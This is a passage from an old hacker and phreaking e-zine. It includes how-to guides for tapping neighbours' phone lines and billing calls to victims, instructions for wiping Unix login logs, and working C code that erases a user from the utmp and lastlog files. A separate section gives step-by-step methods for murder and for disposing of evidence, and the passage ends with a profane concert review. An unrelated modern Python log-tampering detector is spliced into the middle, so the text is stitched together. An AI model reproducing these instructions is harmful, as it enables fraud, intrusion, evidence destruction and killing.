but that is easily by passed by simply not doing it from your house. Here is a simple plan for using your neibors phone line to do your deeds (I am lucky for I have a kid next door who tells everyone hes a hacker so if I ever get caught its him who gets the blame). Ok here we go, on most rural or suburban neiborhood there are little gray boxes on the sides of the houses, which are locked by a simple screw that you can unscrew in a matter of seconds. This little gray box contains usually two phone lines that lead up into the house. If the person has two phone lines then the two jacks will be two different lines, if they have one phoneline then both jacks will be the same line. Ok, if the person has only one phone line you are good to go. (Make sure you do this at night or when your neigbors are away on vacation) Dig a small ditch from your neigbors gray box to your house's nearest window, then get some long phone cords (Usually found at radio shack) and run it from the gray box to your nearest phone in your house. Cover up the ditch and you got yourself a nice phone line to do what you like. But what if the house has two phonelines and you cant dissconnect one of thier lines just for you to use, you may ask. That is right thats just screamin for yourself to get caught, so heres what you do! Go to radio shack and pick up a splitter they kinda look like this || --- / \ |_____| I know thats a real lame depiction of the splitter itsself, but uhm what it does is you can split one line into two lines. 
So do the same as the one liner and dig a ditch etc etc, but put the splitter in and lead one line into your neighbor's house and the other to your house, so no suspicion when they use their second phone line and they have no dial tone.. Also I suggest you do all your callin on their phone line when they are not home, and don't try to listen in on their phone calls cuz each time you pick up the phone there's a really loud click that the other party can hear.. Use it just for doing the stuff you wouldn't dare using your phone line to do. So when the cops start pullin up, you don't have to worry, it's all next door.

Now on to unix, and linux. When you do anything on a linux server, you are logged. The three main log files you really should worry about are 'lastlog', 'UTMP', and 'WTMP'. The only way to edit these files is if you have root cuz only root owns these files. Here's a brief description of the 3 important log files.

LastLog - Where the last login came from.
WTMP - every log on and off, with login and logout time plus tty and host.
UTMP - Who is currently logged in on the server.

Here's where they can be found on various operating systems. Usually in linux you can find all the log files in /usr/var/adm

LastLog         UTMP        WTMP
-------         ------      ------
/usr/var/adm    /etc        /etc
/usr/adm        /var/adm    /var/adm
/var/adm        /usr/var    /usr/var
/var/log        /usr/adm    /usr/adm
                /var/log    /var/log

If one of them is in one of those directories, all the rest tend to be in the same directories. And don't forget if you used the famed phf exploit to get your password file that you cracked, don't forget to erase everything in the /httpd/logs file, in which a lot of hackers neglect to do!

Things not to do
----------------
Never, ever, ever, ever totally delete the log files for the fact that root then knows that there was a hacker in the midst of his system.

Don't go into /etc/motd and change the motd. That's the first thing most lame fuckers do, and that's just another way of screaming 'A HACKER WAS HERE!'
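For the lastlog, UTMP and WTMP files described above, the defender's side, as an added example that is not part of the original article: the code below parses wtmp-style records and flags a record that was blanked in place, a logout with no matching login, and a timestamp that runs backwards. The 384-byte glibc/Linux record layout, the function names and the sample log are assumptions of this example, and the sample log is constructed.

```python
import struct

# One record in the glibc/Linux utmp and wtmp layout (384 bytes). Other
# systems lay the record out differently; this layout is an assumption.
# Fields: type, pid, line, id, user, host, exit(2 shorts), session,
#         tv_sec, tv_usec, addr, unused
REC = struct.Struct("<hxxi32s4s32s256shhiii16s20s")
EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8


def _text(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse(blob):
    """Return (records, leftover_bytes); each record is a dict."""
    records = []
    whole = len(blob) - len(blob) % REC.size
    for off in range(0, whole, REC.size):
        chunk = blob[off:off + REC.size]
        f = REC.unpack(chunk)
        records.append({
            "index": off // REC.size,
            "type": f[0], "pid": f[1], "line": _text(f[2]),
            "user": _text(f[4]), "host": _text(f[5]), "time": f[9],
            "blank": not any(chunk),      # every byte of the record is zero
        })
    return records, len(blob) - whole


def audit(blob):
    """Return a list of (record_index, finding) for a wtmp-style log."""
    records, leftover = parse(blob)
    findings = []
    if leftover:
        findings.append((len(records),
                         "partial record: %d trailing bytes" % leftover))
    open_lines = set()    # terminals with a login that has not logged out
    last_time = None
    for r in records:
        if r["blank"]:
            # wtmp is append-only, so an all-zero record means an entry
            # was overwritten in place after it was written.
            findings.append((r["index"], "blanked record"))
            continue
        if last_time is not None and r["time"] < last_time:
            findings.append((r["index"], "timestamp goes backwards"))
        last_time = r["time"]
        if r["type"] == BOOT_TIME:
            open_lines.clear()            # a reboot ends every session
        elif r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] not in open_lines:
                findings.append(
                    (r["index"], "logout on %s without a login" % r["line"]))
            open_lines.discard(r["line"])
    return findings


def make(rtype, line="", user="", host="", when=0, pid=0):
    """Build one constructed record for the sample log below."""
    return REC.pack(rtype, pid, line.encode(), b"", user.encode(),
                    host.encode(), 0, 0, 0, when, 0, b"", b"")


# Constructed sample log (not real data): record 2 has been zeroed, which
# also orphans the logout in record 4; record 5 carries an earlier time.
SAMPLE = b"".join([
    make(BOOT_TIME, "~", "reboot", when=1000),
    make(USER_PROCESS, "pts/0", "alice", "ws1.example", when=1100, pid=411),
    bytes(REC.size),
    make(DEAD_PROCESS, "pts/0", when=1300, pid=411),
    make(DEAD_PROCESS, "pts/1", when=1400, pid=502),
    make(USER_PROCESS, "pts/2", "bob", "ws2.example", when=1350, pid=610),
])

if __name__ == "__main__":
    for index, finding in audit(SAMPLE):
        print("record %d: %s" % (index, finding))
```

The logout and timestamp findings are leads rather than proof: a rotated wtmp starts in the middle of sessions, and clock changes also move timestamps.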
(Why is it when someone acctually gets into a system they feel compled to tell someone that they were there?) Dont put in suid root shells anywhere, your better off compiling a backdoor so you can access it anytime without being noticed by commands like user or finger.. Dont hack the webpage the server is using, unless you have a pretty damn good reason to do it and not just to show off to your friends and to try to be cool Some codes to help you along the way ------------------------------------ Marry.c is a great program for editing log files. Lots of flags to play with and over all its a great fucking program to use to edit and spoof logs. You can get the source redily at most sites that offer "hacking" codes. Im sure alot of people can back me up in saying this is one of the best. (http://www.rootshell.com is one of the places you can get it) This next program basicly just erases yourself from all the logs, its simple but it also screams to the sysadmin that there was a hacker present in the machine #include #include #include #include #include main(argc, argv) int argc; char *argv[]; { char *name; struct utmp u; struct lastlog l; int fd; int i = 0; int done = 0; int size; if (argc != 1) { if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) { printf("You are now cloaked\n"); goto start; } else { printf("close successful\n"); exit(0); } } else { printf("usage: close [file to close]\n"); exit(1); } start: name = (char *)(ttyname(0)+5); size = sizeof(struct utmp); fd = open("/etc/utmp", O_RDWR); if (fd < 0) perror("/etc/utmp"); else { while ((read(fd, &u, size) == size) && !done) { if (!strcmp(u.ut_line, name)) { done = 1; memset(&u, 0, size); lseek(fd, -1*size, SEEK_CUR); write(fd, &u, size); close(fd); } } } size = sizeof(struct lastlog); fd = open("/var/adm/lastlog", O_RDWR); if (fd < 0) perror("/var/adm/lastlog"); else { lseek(fd, size*getuid(), SEEK_SET); read(fd, &l, size); l.ll_time = 0; strncpy(l.ll_line, "ttyq2 ", 5); gethostname(l.ll_host, 16); lseek(fd, 
size*getuid(), SEEK_SET); close(fd); } } Now as a concluding paragraph Ive decided to show you why you should be paranoid as shit. The first and only time I was busted wasnt because I neglected to erase log files, or I told eveyone about my doings, it was because there was a large suspision that I was an alleged "hacker". So because of this I was not only kicked out of college, I also found out that I was being watched for 3 weeks including undercover bitches posing as my classmates to try to rip out info on me..You can call this discrimination, biased thoughts, or whatever you want, but the fact is, no one even likes the term hacker, the simple word brings up thoughts of some punk teen giving other people virus's. Much like marijuana legalazation, gay rights, abortion, racisim, hacking is a very very touchy subject that our governmetn likes to brush under the carpet and try to just forget it. But its there, and the hackers like codezero (hacking amnesty international) are giving the real hackers a bad name, givin the term hacker even more of a discriminitory meaning..What Im trying to say here is, be paranoid, dont talk shit, and look after your own ass. &&&&&&&&&&&&&&&&&&&&&&&&& P h r e a k i n g &&&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Modified SNI phreakin. $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ LaYmUr and X-Bishop fun thing 1-modified busy box -(sum1 elses sni box) normally the wannabe phreaks would tell u to get a fone wire and connect the red wire to the green one and tangle it up in all the wires, but if your sni is like mine it is neat and pretty. The new busy box is very simple all u will probably need is a screwdriver. If u dont know how to take off the cover or u dont know wut the hell u r lookin for (sni) pick up the fone and dial 0. the operator will gladly tell you how to do this method of phreakin (how in the hell do u think we have figured it out? field werk? ehhe). 
Now u have the cover off and your lookin at a bunch of modular jacks. Listen carefully, this is where is gets difficult, gently unplug all of the modular jacks so that they barely rest in the socket but are not in there all the way. Congrats on your modified busy box, and welcome to the world of phreaking if you're really pissed at them or just mean as hell, just cut the fuckin wire. fun thing 2-modified SNI biege box - Watch ure neighbors they are vital to the mission. Wait til one weekend they go outta town or somewhere and the house is totally unguarded(dogs included). Take a fone and some fone wire over to the the unguarded house. Ths one is pretty simple, remember the sni? Well open it up again. U see that modular jack. Plug your fone into it and dial away. Nuff said... fun thing 4-modified fone tappin-First off u will need a two-way jack. They are probably about $3 at walmart or sumthin. They are small so u can probably get them on five-finger discount all-day. Go to the sni box again and open it up, get your two-way jack and plug it in. plug the fone wire into one of the jacks. Plug your cheap ass fone into the other one wait on a call. U can hear them but they CAN hear u too... NOTE: Real phreakers dont have 3's in thier number system...and if ure stupid enuff to try this shit, ure stupid enuff to take the credit...Ma Bell is officially responsible for all of your actions, foriegn, illegal, and non-domestic $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$$$$$ Pitting $$$$$$$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Lord Duke Ok folks... u wanna scam free calls. Well, this is an introduction to one of the many methods that can be used to go about free calls. This method is often referred to as 'pitting'. It is a method that does not involve tone generation, and is alot more generalised, which means it is directly applicable to just about any phone system around. What is pitting? 
---------------- Pitting is a method of phreaking where the attacker uses a device commonly referred to as a beige box to become an extension on somebody elses fone line. You then call out and the victims line who you were using is billed for whatever calls that you make! cool, huh? What you Need ------------- 1) Beige Box 2) Metal Lifters 3) Torch 4) Stanley knife 5) Bag to carry things in 6) Friend What is a beige box? -------------------- A beige box is just a fone soldered to some alligator clips. To make one, buy a cheap fone, probably a handset fone is the easiest (easy to carry, etc.) and then cut the plug at the end of it off. You should now have you fone with a chord dangling off it with no plug at the end. Now, at the end of the chord, carefully strip the protective coating back a little, this should reveal two small wires. Solder the alligator clips to these two wires. So now you have your handset with about one metre of chord dangling off, soldered to aligator clips. Thats it! theres your beige box! What are Metal Lifters? ----------------------- You are going to be lifting up those little concrete lids that you see every few houses. They look sorta like this: ------------------------------- | | | 0 T 0 | | | -------------------------------- (sorry bout the bad ascii art). So you are going to need something to pry them up with. Try to find some thin peices of bent metal that you can stick in the holes and open the pit with. I know you are thinking "now where the hell am i gonna find one of them?!?!" well thats what i thought at first, but if you look around, you are sure to find something adequate. How To go pitting ----------------- This must be carried out late as a pair of obviously unqualified people opening a pit and screwing with the wires looks FAR too suspiscious. And aslo, you have to do it at a time when the residents are not using their fone!! I will write this down in step form so it is easier to follow: 1) Find a pit. 
I strongly recommend using the smaller pits because they are shallower, and only have one or two chords.. no descision making! 2) Use you metal lifters to pry the concrete lid off (metal lid in some cases). 3) Inside you will see a few black chords. Choose one and CAREFULLY strip the protective coating back. Inside you should see 4 small wires. Where I live these wires are blue, white, red, and black. These wires are actually the wires for two fone lines. The blue and white are for the houses primary line and red and black are for their secondary line. As alot of houses dont use their secondary lines we will be dealing with the blue and white chords. 4) Get out you beige box and attach the alligator clips to the blue and white wires. If you live somewhere else you will have to try a few different combinations until you get a dialtone. If by chance you pick up the fone and someone is using it inside the house, you can either: a) hang up quietly and piss off quickly. b) cut the blue and white wires and attach your beige box to the 'alive' side. 5) Thats it! dial out!! Tips For Pitting ---------------- Here are some tips to help you not get caught: 1) ALWAYS take a friend with you. You cannot watch your surroundings and cut wires at the same time. They are also great for helping uncover the pit, holding the torch while you cut, etc. 2) Try not to visit the same pit twice. 3) Try not to pit too close to home. 4) Dont leave all your shit lying around. Have it all packed so at the first sign of danger you can make a quick escape. 5) Dont go to busy roads even though its late at night. Find secluded pits where you cant be seen easily. 6) After you have uncovered the pit and picked out the chord, it is a good idea to close the pit back over with just the chord hanging out. It will then be easier to cover up what you are doing if someone should drive past. 
7) If a car does drive past, hide ur shit behind you and sit in front of the pit and beige box so they cant see it and pretend you are just talking with your friend or youre drunk or something. You will look far more suspiscious if at the first sign of a car, you get up and bolt. 8) Dont leave pits uncovered. It quickly becomes obvious that someone has been there if you do. HAVE FUN PEOPLE!! &&&&&&&&&&&&&&&&&&&&&&&&& A n a r c h y &&&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ How to kill someone. $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Heh... this shit is due to my own insanity so bear with me. For christ's sake this is just for conv- ersation only... do not do this. Method #1 (the yuppy way) Step one: you supply the reason you want to kill this fuck. Step two: get close to the victim... marry his daugher, become his best friend, marry her ugly-ass two-toothed sister. Step three: get an alibi: like be making a public speech about HIV when the victim wakes up... grabs the milk and keels over from the poison. Step four: think of a subtle way to kill the victim... no do not bust a cap in his ass unless you want cops after you quick style. Something sensible, something that can't be traced (use your imagination... like try some poison, a loose break cable, anything... this is supposed to be revenge so have fun with the idea). METHOD #2 (the anarchist way) Step one: get a glass cutter. Step two: use that cutter to break into a gun store (fucking do it at night jackass) Step three: grab a deer-rifle... maybe a .243... make sure you can aim it steady Step four: run like a mother-fucker out of there Step five: pick a remote spot that your victim can be sniped from Step six: stay hidden... shoot... stay hidden... wait till confusion breaks out... WALK away... keep the gun hidden ... maybe under a jacket Step seven: dismantle the gun into as many peices as it goes... scatter the peices in a river. 
_-=[Morbid Malitia Man's Trouble-shooting manual:]=-_ CORPSE DISPOSAL: If this situation is ever required (it shouldn't be... corpse disposal is to risky... to many chances of gettin' caught.) I will fire a few words at you: TRUNK, DEEP WOODS, SHOVEL. NERVOUSNESS: Sit the fuck down, think, sleep, no caffeine. BEING A SUSPECT: Stay cool, do business as usual, do not meet anybody "strange". THE VICTIM IS STIL ALIVE: Threaten him, scare him, put a horses head in his bed. /=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/ //Pentium Ru sup pentru@win.bright.net ICE icesite.home.ml.org Unknown www.gtd.net/unknown Sektor X www.stryfe.com/sektor_x &&&&&&&&&&&&&&&&&&&&&&&& M u s i c &&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ KoRn live in KC! $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Me and my freind Aarin couldn't wait to see KoRn. We had been both been listening to thier music since they first released the self titled debut album. They had come here many times before but all of them we had things going on so we missed them. Not it was finally going to happen. The opening bands for KoRn were Limp Bizkit and Helmet. I had never heard of Limp Bizkit but from the name i guessed they would be some trendy alternative band shit. As for helmet i was disappointed to learn they were opening for KoRn. Around 7 we arrived at Memorial Hall where KoRn would be playing and walked in. It was pretty crowded. I also noticed a lot of differnt type of people in the crowd. There was preps, freaks (the manson, black lip stick dorks), all around cool people like myself. Anyways we continued in to the show and sat down and awaited Limp Bizkit. The lights went and the place was completely dark. Then a light came on by the stage and you could just barely see Limp Bizkit. And then the lead singer spoke. He talked with an evil voice and for a brief moment I thought they might be a death metal band. 
Then all of a sudden lights came on and they started playing and it was very hardcore shit. They sounded like Deftones and Downset. Hardcore rap. It was very cool. I thought I was going to hate them but I ended up handbanging to thier music instead. Just as I was really getting in to them tho they were over. They threw out some demo tapes tho and got out there with the crowd. Helmet was getting ready to come on and I was not looking forward to this because they fucking suck. About 5 mins before they come on two fat bitchez come up with some security dude cuz we were in thier seats so we had to move. So we moved over to the other side of the seats and sat there. Then it happend. Lights went dark again and out walked Helmet. They were just plain dorks. They came out and made comments like 'Yes we all have big orgies back there. We all fuck each other'. And they thought they sounded cool when everyone was like... ok dumb fucks hurry up and get done. No one there really seemed to enjoy Helmet. I heard comments of "will they get done already" and things like that during their performance. Everyone there came for some heavy music and all they got from Helmet were the same riffs and pussy vocals. I can't say anyone was really dissappointed cuz most people expected them to suck. Finally they ended tho with a song that wasn't that bad. It was Just Another Victim from the Judgement Night soundtrack. A lot of people were happy to see them leave and noticed how most of the people in the mosh pit had been sitting down during thier show. Finally it was time for korn. The curtains came down as they begin to set up and some chics who we were sitting next to sparked up a joint and smoked up with us which was pretty cool cuz we had forgot our weed and left it at home. I didn't take more then a couple hits off it tho because I wanted to remember Korn playing. Then the whole place went black and the curtain moved to show a big white curtain that lights shined thru. 
Then all of the members of Korn were behind it with their shadows showing thru the white screen really big. And then it happened. Jonathon Davis started off with his familiar words from the song twist... the first song on Life is Peachy. "RRRRRRATATA ATATAAA ATAAA ERR TAATATA" and everyone went cyco. The mosh pit exploded with people jumping and slamming into each other and people in the seats were getting in to it also. Soon the song ended and you heard Jonathon scream "ARE YOU READY!?" and the white curtain dropped to the floor and they went in to playing blind. It was incredible seeing everyone go crazy. Jonathon Davis was wearing his familiar Adidas outfit and everything was just exactly how you would expect. Then came ball tongue. The guitars were so heavy and the bass and drums were super loud also. Then they paused for a minute during ball tongue and Jonathon Davis took a few steps back... then he came back to the mike and started screaming "Loddi doddi we likes to party we don't cause trouble we don't bother nobody cuz we're just some kids around the mic when we rock the mic we rock the mic right!". It was fucking cool as hell. Then they went into playing other songs and Jonathon left the stage and walked back out with his bagpipes. Everyone started screaming at this and he started playing Low Rider. They did it exactly like it is played on their cd but then the bagpipes went into playing some other shit and all of a sudden it was the intro to Shoots and Ladders. Then it came... he was up there screamin NICK NACK PADDY WACK GIVE A DOG A BONE but they changed the end and it was all GIVE A DOG A BA BA BA. It was really cool, everyone was feeding off the energy Korn was releasing. Then people started to jump on the stage. One guy got up and started running around Jonathon Davis before the guards came after him and he stage dived into the pit. Another guy unfortunately was caught by security and removed.
Everything was going cool then they stopped and Fieldy started to say some shit. Then out came the singer from Limp Bizkit to sing wicked with them. It was cool as fuck he sounded exactly like the singer from Deftones. I wasn't expected Wicked but it was really cool. Then they played Kill You and the curtains closed and i thought it was over. But then the curtains opened again and they played thier final song Faggot. It was so cool cuz everyone was screaming along with Korn as he yelled "YOU CAN SUCK MY DICK AND FUCKING LIKE IT!!". Then it went on with music and the curtains closed and you still heard them playing but the show was done. It was definatly one of the best concerts I had been to. While Helmet put everyone to sleep Korn came out there and woke everyone the fuck up.